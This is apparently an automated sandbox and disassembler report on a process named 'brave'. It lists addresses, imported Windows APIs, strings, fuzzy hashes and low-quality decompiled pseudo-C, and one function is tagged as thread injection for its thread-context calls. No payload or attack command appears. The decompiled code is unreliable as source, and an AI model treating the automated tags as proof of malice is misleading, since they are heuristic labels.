0x7ff652b322eb
0x7ff652b322f7
0x7ff652b32308
0x7ff652b32311
0x7ff652b32316
0x7ff652b3231d
0x7ff652b32322
0x7ff652b32327
0x7ff652b3232d
0x7ff652b32341
0x7ff652b32343
0x7ff652b3235a
0x7ff652b3235d
0x7ff652b3236c
0x7ff652b32371
0x7ff652b32375
0x7ff652b32377
0x7ff652b3237c
0x7ff652b32385
0x7ff652b32391
0x7ff652b32392
0x7ff652b32393
0x7ff652b32395
0x7ff652b32397
0x7ff652b323a3
0x7ff652b323aa
0x7ff652b323b0
0x7ff652b323c0
0x7ff652b323c5
0x7ff652b323c7
0x7ff652b323e0
0x7ff652b323e7
0x7ff652b323f1
0x7ff652b323fc
0x7ff652b32409
0x7ff652b3240d
0x7ff652b3241c
0x7ff652b32429
0x7ff652b3242b
0x7ff652b32437
0x7ff652b32439
0x7ff652b32445
0x7ff652b32447
0x7ff652b32455
0x7ff652b3245c
0x7ff652b32477
0x7ff652b3247a
0x7ff652b32481
0x7ff652b3248c
0x7ff652b32499
0x7ff652b324a1
0x7ff652b324ac
0x7ff652b324b9
0x7ff652b324c0
0x7ff652b324cc
0x7ff652b324d6
0x7ff652b324dc
0x7ff652b324e7
0x7ff652b324ec
0x7ff652b324f5
0x7ff652b32504
0x7ff652b32506
0x7ff652b32507
0x7ff652b3250b
0x7ff652b3250f
0x7ff652b32518
0x7ff652b32522
0x7ff652b32526
0x7ff652b3252f
0x7ff652b32531
0x7ff652b32536
0x7ff652b32544
0x7ff652b32558
0x7ff652b32563
0x7ff652b32570
0x7ff652b32574
0x7ff652b32581
0x7ff652b3258a
0x7ff652b32597
0x7ff652b3259d
0x7ff652b325a3
0x7ff652b325ad
0x7ff652b325b4
0x7ff652b325c4
0x7ff652b325d0
0x7ff652b325d4
0x7ff652b325e7
0x7ff652b325eb
0x7ff652b325f0
0x7ff652b325f7
0x7ff652b32602
0x7ff652b3260f
0x7ff652b3261a
0x7ff652b32629
0x7ff652b32636
0x7ff652b32644
0x7ff652b32646
0x7ff652b32653
0x7ff652b32660
0x7ff652b32666
0x7ff652b32674
0x7ff652b3267f
0x7ff652b32685
0x7ff652b3268f
0x7ff652b32698
0x7ff652b326a1
0x7ff652b326ac
0x7ff652b326b2
0x7ff652b326ba
0x7ff652b326c0
0x7ff652b326c2
0x7ff652b326c8
0x7ff652b326cc
0x7ff652b326dc
0x7ff652b326e8
0x7ff652b326ef
0x7ff652b326f8
0x7ff652b326ff
0x7ff652b32708
0x7ff652b32712
0x7ff652b32716
0x7ff652b3271b
0x7ff652b32721
0x7ff652b32726
0x7ff652b32730
0x7ff652b3273a
0x7ff652b3273e
0x7ff652b32743
0x7ff652b32749
0x7ff652b3274e
0x7ff652b32758
0x7ff652b32760
0x7ff652b32769
0x7ff652b32772
0x7ff652b32778
0x7ff652b32785
0x7ff652b3278b
0x7ff652b32792
0x7ff652b32798
0x7ff652b327a0
0x7ff652b327a9
0x7ff652b327b2
0x7ff652b327b8
0x7ff652b327c0
0x7ff652b327cb
0x7ff652b327d5
0x7ff652b327db
0x7ff652b327ec
0x7ff652b327f5
0x7ff652b327fb
0x7ff652b32804
0x7ff652b32808
0x7ff652b32814
0x7ff652b32818
0x7ff652b32827
0x7ff652b3282b
0x7ff652b32833
0x7ff652b3283e
0x7ff652b3284b
0x7ff652b3284f
0x7ff652b32858
0x7ff652b32865
0x7ff652b3286c
0x7ff652b32870
0x7ff652b3287b
0x7ff652b32888
0x7ff652b3288c
0x7ff652b32895
0x7ff652b328a2
0x7ff652b328aa
0x7ff652b328b5
0x7ff652b328c2
0x7ff652b328c7
0x7ff652b328ce
0x7ff652b328d9
0x7ff652b328df
0x7ff652b328e3
0x7ff652b328ef
0x7ff652b328fc
0x7ff652b328ff
0x7ff652b3290f
0x7ff652b32915
0x7ff652b3291a
0x7ff652b32925
0x7ff652b3292b
0x7ff652b32935
0x7ff652b32939
0x7ff652b32942
0x7ff652b32948
0x7ff652b32954
0x7ff652b32958
0x7ff652b32968
0x7ff652b3296e
0x7ff652b3297c
0x7ff652b32985
0x7ff652b3298b
0x7ff652b32997
0x7ff652b329a5
0x7ff652b329ab
0x7ff652b329b9
0x7ff652b329c2
0x7ff652b329c8
0x7ff652b329d4
0x7ff652b329de
0x7ff652b329e4
0x7ff652b329f2
0x7ff652b329fb
0x7ff652b32a01
0x7ff652b32a06
0x7ff652b32a10
0x7ff652b32a17
0x7ff652b32a21
0x7ff652b32a26
0x7ff652b32a30
0x7ff652b32a35
0x7ff652b32a3a
0x7ff652b32a40
0x7ff652b32a4a
0x7ff652b32a4e
0x7ff652b32a57
0x7ff652b32a5d
0x7ff652b32a6a
0x7ff652b32a70
0x7ff652b32a77
0x7ff652b32a7d
0x7ff652b32a8b
0x7ff652b32a94
0x7ff652b32a9a
0x7ff652b32aa7
0x7ff652b32aac
0x7ff652b32ab3
0x7ff652b32ab9
0x7ff652b32ac1
0x7ff652b32aca
0x7ff652b32ad3
0x7ff652b32ad9
0x7ff652b32ade
0x7ff652b32ae6
0x7ff652b32aec
0x7ff652b32af2
0x7ff652b32afc
0x7ff652b32b03
0x7ff652b32b14
0x7ff652b32b27
0x7ff652b32b32
0x7ff652b32b3b
0x7ff652b32b4e
0x7ff652b32b72
0x7ff652b32b77
0x7ff652b32b7c
0x7ff652b32b83
0x7ff652b32b89
0x7ff652b32b93
0x7ff652b32b9d
0x7ff652b32ba6
0x7ff652b32ba8
0x7ff652b32bb1
0x7ff652b32bb5
0x7ff652b32bbc
0x7ff652b32bc2
0x7ff652b32bca
0x7ff652b32bd3
0x7ff652b32bdc
0x7ff652b32be2
0x7ff652b32bef
0x7ff652b32bf5
0x7ff652b32bfc
0x7ff652b32c02
0x7ff652b32c0a
0x7ff652b32c13
0x7ff652b32c18
0x7ff652b32c1e
0x7ff652b32c23
0x7ff652b32c2f
0x7ff652b32c33
0x7ff652b32c3f
0x7ff652b32c46
0x7ff652b32c52
0x7ff652b32c56
0x7ff652b32c62
0x7ff652b32c69
0x7ff652b32c73
0x7ff652b32c80
0x7ff652b32c87
0x7ff652b32c8c
0x7ff652b32c99
0x7ff652b32c9e
0x7ff652b32ca8
0x7ff652b32cb2
0x7ff652b32cb7
0x7ff652b32cbf
0x7ff652b32cc8
0x7ff652b32ccd
0x7ff652b32cd3
0x7ff652b32cdc
0x7ff652b32ce0
0x7ff652b32cea
0x7ff652b32cf0
0x7ff652b32d01
0x7ff652b32d0a
0x7ff652b32d10
0x7ff652b32d15
0x7ff652b32d1a
0x7ff652b32d23
0x7ff652b32d2d
0x7ff652b32d2f

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF652B322CD
_ultoa.MSVCRT ref: 00007FF652B322E0
OutputDebugStringA.KERNEL32 ref: 00007FF652B32327
abort.MSVCRT ref: 00007FF652B3232D

Strings

thread , xrefs: 00007FF652B3225E
Error cl, xrefs: 00007FF652B32227
eaning u, xrefs: 00007FF652B32231
eys for , xrefs: 00007FF652B3224F
p spin_k, xrefs: 00007FF652B32240

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CurrentDebugOutputStringThread_ultoaabort
String ID: Error cl$eaning u$eys for $p spin_k$thread
API String ID: 4191895893-3545615192
Opcode ID: 5e02075398575467d757778500d00e02b97ceec7ff2355a5d38304a33f0ea4e3
Instruction ID: 23dc6541c8ba62aa8594830b0a6300fd74424792021474a10e5c74458087bf49
Opcode Fuzzy Hash: 5e02075398575467d757778500d00e02b97ceec7ff2355a5d38304a33f0ea4e3
Instruction Fuzzy Hash: 2921747260CB8186EB608B14F45832BB6E1F79674CF548234E2CD97B98DFBDD8488B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2F750 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF652B2F761
WaitForSingleObject.KERNEL32 ref: 00007FF652B2F772
FindAtomA.KERNEL32 ref: 00007FF652B2F7DF
ReleaseMutex.KERNEL32 ref: 00007FF652B2F7ED
CloseHandle.KERNEL32 ref: 00007FF652B2F7F6
CloseHandle.KERNEL32 ref: 00007FF652B2F817

Strings

failed to to lock cleanup mutex, xrefs: 00007FF652B2F808

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
String ID: failed to to lock cleanup mutex
API String ID: 3776795807-674698732
Opcode ID: 71f342f9f933a52b181f13a2de0319036eade7889627a245c740d797601e7c04
Instruction ID: 11d22b418ef4c51b2b578460f13d361a205f1433a5cef9191fd7c17741297a8e
Opcode Fuzzy Hash: 71f342f9f933a52b181f13a2de0319036eade7889627a245c740d797601e7c04
Instruction Fuzzy Hash: 3E2115A5B05B4381EE559B51DC591787391BF56B8DB4C9735C80DEB3A0EEBCE841C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B41DD0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF652B41DE1
GetProcAddress.KERNEL32 ref: 00007FF652B41DF8
LoadLibraryW.KERNEL32 ref: 00007FF652B41E1F
GetProcAddress.KERNEL32 ref: 00007FF652B41E2F

Strings

SystemFunction036, xrefs: 00007FF652B41E25
msvcrt.dll, xrefs: 00007FF652B41DDA
advapi32.dll, xrefs: 00007FF652B41E18
rand_s, xrefs: 00007FF652B41DEE

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 4f62b90e336705d4da321a7fa2fb84c276bc2db0b258b9504fce3f42ee99db90
Instruction ID: bd82f5056b94e1813372da816ced39126fb81d582c1b77049b2f0eac304caec8
Opcode Fuzzy Hash: 4f62b90e336705d4da321a7fa2fb84c276bc2db0b258b9504fce3f42ee99db90
Instruction Fuzzy Hash: 04F01721E1AA0390EE05DB51FCA40783364BF0975CB4C0735C80DA2368EEACE558C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4DEF0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF652B4DF96
memcpy.MSVCRT ref: 00007FF652B4DFC1
memcpy.MSVCRT ref: 00007FF652B4E030
memcpy.MSVCRT ref: 00007FF652B4E06E
memcpy.MSVCRT ref: 00007FF652B4E0BF

Strings

basic_string::_M_replace, xrefs: 00007FF652B4E1DE

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: 83352c911b5e7a670d2c16afee725c69e32d097fda13c06022162402ec47247e
Instruction ID: 51e246015c3a354dd86883e84262219478fbea3884a633204bb25656d864ad66
Opcode Fuzzy Hash: 83352c911b5e7a670d2c16afee725c69e32d097fda13c06022162402ec47247e
Instruction Fuzzy Hash: 21710822E19A5791E920DF15C8845BD6756AB02F8CF8C4632EE9DA77D0DEBDE441C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4AE20 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF652B4AEC5
memcpy.MSVCRT ref: 00007FF652B4AEF0
memcpy.MSVCRT ref: 00007FF652B4AF59
memcpy.MSVCRT ref: 00007FF652B4AF8D
memcpy.MSVCRT ref: 00007FF652B4AFD9

Strings

basic_string::_M_replace, xrefs: 00007FF652B4B0E1

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: 6e4ccbe5bf110cb7a92f3fabf76553f9e581279dc44f1e42f5d797bc024edc43
Instruction ID: b56c7a029edc683d74a4c91562f1f0b5c4a3dc0d44379f9ee866b7f57bc45f82
Opcode Fuzzy Hash: 6e4ccbe5bf110cb7a92f3fabf76553f9e581279dc44f1e42f5d797bc024edc43
Instruction Fuzzy Hash: AF616A62E1D6D691E9218E2588901B82A66AF03BCCF5C4132DFECB77C2DDADE441C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B35AE0 Relevance: 13.7, APIs: 9, Instructions: 182
threadinjectionsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00007FF67FF652B35AE0(void* __ecx, void* __edi, void* __rax, void* __rcx) {
				char _v1272;
				signed int _t18;
				void* _t39;
				void* _t40;
				void* _t42;
				intOrPtr _t50;
				void* _t51;
				intOrPtr* _t52;

				_t39 = __rax;
				_t51 = __rcx;
				E00007FF67FF652B33190(__edi, __rcx);
				_t42 = _t39;
				if (_t39 == 0) goto 0x52b35bce;
				_t40 =  *((intOrPtr*)(_t39 + 0x28)) - 1;
				if (_t40 - 0xfffffffd > 0) goto 0x52b35bce;
				if (GetHandleInformation(??, ??) == 0) goto 0x52b35bce;
				_t4 = _t42 + 0x38; // 0x38
				E00007FF67FF652B304E0(_t4);
				E00007FF67FF652B32D40(__ecx,  &_v1272);
				if (_t40 == 0) goto 0x52b35d20;
				_t18 =  *(_t42 + 0x40) & 0x000000ff;
				if (_t51 ==  *((intOrPtr*)(_t40 + 0x1d8))) goto 0x52b35ca0;
				if (( *(_t42 + 0x44) & 0x00000003) == 3) goto 0x52b35be8;
				if ((_t18 & 0x00000003) != 0) goto 0x52b35bc0;
				_t52 =  *0x52dd6920; // 0x7ff652de1400
				_t50 =  *_t52;
				 *(_t42 + 0x40) = _t18 & 0xfffffffc | 0x00000001;
				if (_t50 == 0) goto 0x52b35d50;
				if ( *((long long*)(_t50 + 0x18)) == 0) goto 0x52b35d30;
				asm("lock add dword [eax], 0x1");
				if ( *((intOrPtr*)(_t42 + 0x30)) == 0) goto 0x52b35ba8;
				SetEvent(??);
				E00007FF67FF652B30800(_t4);
				return 0;
			}

0x7ff652b35ae0
0x7ff652b35aed
0x7ff652b35af0
0x7ff652b35af5
0x7ff652b35afb
0x7ff652b35b05
0x7ff652b35b0d
0x7ff652b35b23
0x7ff652b35b29
0x7ff652b35b30
0x7ff652b35b35
0x7ff652b35b3d
0x7ff652b35b4a
0x7ff652b35b51
0x7ff652b35b60
0x7ff652b35b68
0x7ff652b35b6a
0x7ff652b35b77
0x7ff652b35b7a
0x7ff652b35b80
0x7ff652b35b8b
0x7ff652b35b95
0x7ff652b35ba0
0x7ff652b35ba2
0x7ff652b35bab
0x7ff652b35bbf

APIs

GetHandleInformation.KERNEL32 ref: 00007FF652B35B1B

Part of subcall function 00007FF652B32D40: TlsGetValue.KERNEL32 ref: 00007FF652B32DA0

SetEvent.KERNEL32 ref: 00007FF652B35BA2
SuspendThread.KERNEL32 ref: 00007FF652B35BFC
WaitForSingleObject.KERNEL32 ref: 00007FF652B35C08
GetThreadContext.KERNEL32 ref: 00007FF652B35C1C
SetThreadContext.KERNEL32 ref: 00007FF652B35C38
SetEvent.KERNEL32 ref: 00007FF652B35C7E
ResumeThread.KERNEL32 ref: 00007FF652B35C90
SetEvent.KERNEL32 ref: 00007FF652B35CE3

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Thread$Event$Context$HandleInformationObjectResumeSingleSuspendValueWait
String ID:
API String ID: 2335333592-0
Opcode ID: c0454334065818ad910fe9271c82020997dc8f7e4f5c5ab4ac494b7568ff68ad
Instruction ID: 4267bfe0a80cfab1b3d7eae31121a900d7ab5bd7eb8e47ee22fe3fdf86016c9a
Opcode Fuzzy Hash: c0454334065818ad910fe9271c82020997dc8f7e4f5c5ab4ac494b7568ff68ad
Instruction Fuzzy Hash: F18191A2A0964282EA698F25DC043796760FF6AB9DF4C4631CD5CA73D4DFBCE984C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B47980 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF67FF652B47980(intOrPtr* __rcx, void* __rdx) {
				void* _t13;

				_t13 = __rdx;
				if (__rdx - 0xfffffff9 > 0) goto 0x52b479ef;
				E00007FF67FF652B48580(__rcx, __rdx,  *((intOrPtr*)( *__rcx - 0x18)), __rdx);
				if (_t13 == 0) goto 0x52b479cc;
				if (_t13 == 1) goto 0x52b479e0;
				return memset(??, ??, ??);
			}

0x7ff652b47995
0x7ff652b479a5
0x7ff652b479ac
0x7ff652b479b4
0x7ff652b479be
0x7ff652b479d7

APIs

memset.MSVCRT ref: 00007FF652B479C7
memcpy.MSVCRT ref: 00007FF652B47BB9

Part of subcall function 00007FF652B48580: memcpy.MSVCRT ref: 00007FF652B485FB

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B47CB9
basic_string::_M_replace_aux, xrefs: 00007FF652B479EF
basic_string::insert, xrefs: 00007FF652B47CA3, 00007FF652B47CB2

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy$memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 438689982-1339558951
Opcode ID: 2aa7705d7efa051678438d68cb09cc562f26b0b831d3bb896a7316ff393a9a71
Instruction ID: 3f77b6f76f310b0caa2876493905a6d3d7a034dfdfd4f14b4dfa042379378e26
Opcode Fuzzy Hash: 2aa7705d7efa051678438d68cb09cc562f26b0b831d3bb896a7316ff393a9a71
Instruction Fuzzy Hash: 57514352F0969241FA119B6A8C900F813529F07BDCF5C4632DE9CBB7C2DCACE581E380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B391C0 Relevance: 13.6, APIs: 9, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FF67FF652B391C0(void* __esi, long long* __rcx, void* __rdx) {
				long long _v72;
				void* _t12;
				long long* _t28;
				intOrPtr _t47;

				_t28 = __rcx;
				if (__rcx == 0) goto 0x52b39380;
				_t47 =  *((intOrPtr*)(__rcx));
				r13d = 0x16;
				if (_t47 == 0) goto 0x52b392b4;
				if (_t47 == 0xffffffff) goto 0x52b392d0;
				_t1 = _t47 + 0x98; // 0x98
				_t3 = _t47 + 0x70; // 0x70
				_v72 = _t1;
				r8d = 0xffffffff;
				_t12 = E00007FF67FF652B39120(0,  *((intOrPtr*)(_t47 + 0xa8)), _t3);
				r13d = _t12;
				if (_t12 != 0) goto 0x52b392b4;
				if (TryEnterCriticalSection(??) == 0) goto 0x52b393c0;
				if ( *((intOrPtr*)(_t47 + 8)) -  *((intOrPtr*)(_t47 + 0x10)) > 0) goto 0x52b39390;
				 *_t28 = 0;
				E00007FF67FF652B38880(1,  *((intOrPtr*)(_t47 + 0xa8)), _t3, _t1);
				CloseHandle(??);
				CloseHandle(??);
				LeaveCriticalSection(??);
				DeleteCriticalSection(??);
				DeleteCriticalSection(??);
				DeleteCriticalSection(??);
				free(??);
				return r13d;
			}

0x7ff652b391ce
0x7ff652b391d4
0x7ff652b391da
0x7ff652b391dd
0x7ff652b391e6
0x7ff652b391f0
0x7ff652b391f6
0x7ff652b39206
0x7ff652b3920d
0x7ff652b39215
0x7ff652b3921b
0x7ff652b39220
0x7ff652b39225
0x7ff652b39243
0x7ff652b39253
0x7ff652b39259
0x7ff652b3926b
0x7ff652b3927f
0x7ff652b39289
0x7ff652b3928e
0x7ff652b3929e
0x7ff652b392a3
0x7ff652b392aa
0x7ff652b392af
0x7ff652b392c5

APIs

Part of subcall function 00007FF652B39120: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF652B39749), ref: 00007FF652B39146
Part of subcall function 00007FF652B39120: LeaveCriticalSection.KERNEL32(?,00007FF652B39749,?,?,?,?,?,?,?,?,?,?,?,00007FF652DE1400,?), ref: 00007FF652B3916B

TryEnterCriticalSection.KERNEL32 ref: 00007FF652B39233
CloseHandle.KERNEL32 ref: 00007FF652B3927F
CloseHandle.KERNEL32 ref: 00007FF652B39289
LeaveCriticalSection.KERNEL32 ref: 00007FF652B3928E
DeleteCriticalSection.KERNEL32 ref: 00007FF652B3929E
DeleteCriticalSection.KERNEL32 ref: 00007FF652B392A3
DeleteCriticalSection.KERNEL32 ref: 00007FF652B392AA
free.MSVCRT ref: 00007FF652B392AF
LeaveCriticalSection.KERNEL32 ref: 00007FF652B393B1

Part of subcall function 00007FF652B38880: EnterCriticalSection.KERNEL32 ref: 00007FF652B38898
Part of subcall function 00007FF652B38880: ReleaseSemaphore.KERNEL32 ref: 00007FF652B388C6
Part of subcall function 00007FF652B38880: LeaveCriticalSection.KERNEL32 ref: 00007FF652B388D3

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
